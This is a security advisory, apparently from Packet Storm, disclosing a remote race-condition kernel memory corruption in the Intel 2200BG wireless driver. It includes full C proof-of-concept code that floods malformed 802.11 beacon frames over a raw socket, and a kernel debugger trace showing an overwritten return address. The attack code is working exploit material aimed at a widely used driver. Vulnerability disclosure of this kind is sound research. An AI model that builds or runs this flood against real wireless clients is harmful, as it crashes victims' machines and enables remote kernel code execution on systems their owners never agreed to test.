The Intel 2200BG card suffers from a race condition vulnerability. Proof of concept code included.
52fece9a4bfaaa83265054f29f2318eb916e0cfd1bd0d159da6c9810cca9d699Title: Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote race condition memory
corruption flaw.
Malformed beacons frame can be used to corrupt internal kernel
structures,leading to arbitrary code execution.
This vulnerability is triggered when flooding wifi card with many
malformed beacons frame.
The data is copied over internal kernel structures, resulting in
memory operations being performed on attacker-controlled pointer
values, like EIP values.
This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto (Open Communications Security /
bsilva[at]sekure[dot]org) - Initial discovery and PoC
Johnny Cache - help doing a working exploit
Proof Of Concept:
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <linux/wireless.h>
// Change BSSID and SRC MAC ADDR to AP you are associated
char beacon[] = { 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff,
0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,
0x30, 0x2f, 0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00,
0x01, 0x04, 0x00, 0xff, 0x53, 0x41, 0x55, 0x4e, 0x41, 0x01, 0x08, 0x82,
0x84, 0x8b,0x96, 0x24, 0x30, 0x48, 0x6c, 0x04, 0x01, 0x08, 0x05, 0x04,
0x00, 0x01, 0x00, 0x00, 0x2a, 0x01,0x04, 0x2f, 0x01, 0x04, 0x32, 0x04,
0x0c, 0x12, 0x18, 0x60, 0xdd, 0x06, 0x00, 0x10, 0x18, 0x02,0x00, 0xf4,
0x08, 0xc1, 0xca, 0x93 };
int main() {
struct sockaddr_ll link;
struct ifreq iface;
int s, i, randd = 0x22, j, m, a, b;
unsigned long len = 0, c = 0;
char s_1[700+sizeof(beacon)];
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
return 0;
bzero(&iface,sizeof(iface));
bzero(&link,sizeof(link));
bzero(s_1,sizeof(beacon));
strcpy(iface.ifr_name,"ath0raw");
if(ioctl(s,SIOCGIFHWADDR, &iface)) {
return 0;
}
if(ioctl(s,SIOCGIFINDEX, &iface)) {
return -1;
}
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
return -1;
}
link.sll_family = AF_PACKET;
link.sll_ifindex = iface.ifr_ifindex;
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
return -1;
}
memcpy(s_1,beacon,sizeof(beacon));
randd = 0x44;
for(i=0;i<33;i++)
s_1[37+i] = 0x44;
for(;;) {
i = 147;
for(j=0;j<i;j++) {
if(randd == 0xff)
randd = 0x00;
s_1[70+j] = randd++;
}
randd = 0x44;
for(m=0;m<5;m++) {
len = sendto(s,s_1,strlen(beacon)+j, 0, NULL, 0);
printf("Sent %d\n",len);
}
}
close(s);
return 0;
}
Debugging Information:
BugCheck D1, {402, 2, 0, f6806422}
*** ERROR: Module load completed but symbols could not be loaded for
w29n51.sys
Probably caused by : w29n51.sys ( w29n51+4e422 )
Followup: MachineOwner
---------
kd> kv
ChildEBP RetAddr Args to Child
f7a92e68 f6806422 badb0d00 ffffffd2 00000000 nt!KiTrap0E+0x233 (FPO: [0,0]
TrapFrame @ f7a92e68)
WARNING: Stack unwind information not available. Following frames may be
wrong.
f7a92f24 5b5a5958 00000378 ffffffd2 015dcf64 w29n51+0x4e422
f7a92f4c f67f56b5 8659feb0 01010077 00000000 0x5b5a5958
f7a92f64 f67f2f09 8659f000 f7a92f94 f67de759 w29n51+0x3d6b5
f7a92f70 f67de759 8659f000 4001000d 4001000d w29n51+0x3af09
f7a92f94 f67cf873 86dc8568 86dc6888 00000000 w29n51+0x26759
f7a92fa8 f67b938c 86dc6888 86bd1000 f7a92fd0 w29n51+0x17873
f7a92fb8 f74aaf09 86bd1000 448a47c0 00000001 w29n51+0x138c
f7a92fd0 804dbbd4 86dc8580 86dc856c 00000000 NDIS!ndisMDpcX+0x21 (FPO:
[Non-Fpo])
f7a92ff4 804db89e f1751d54 00000000 00000000 nt!KiRetireDpcList+0x46 (FPO:
[0,0,0])
f7a92ff8 f1751d54 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a
(FPO: [Uses EBP] [0,0,1])
804db89e 00000000 00000009 bb835675 00000128 0xf1751d54
Return address was overwrote with 0x5b5a5958.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed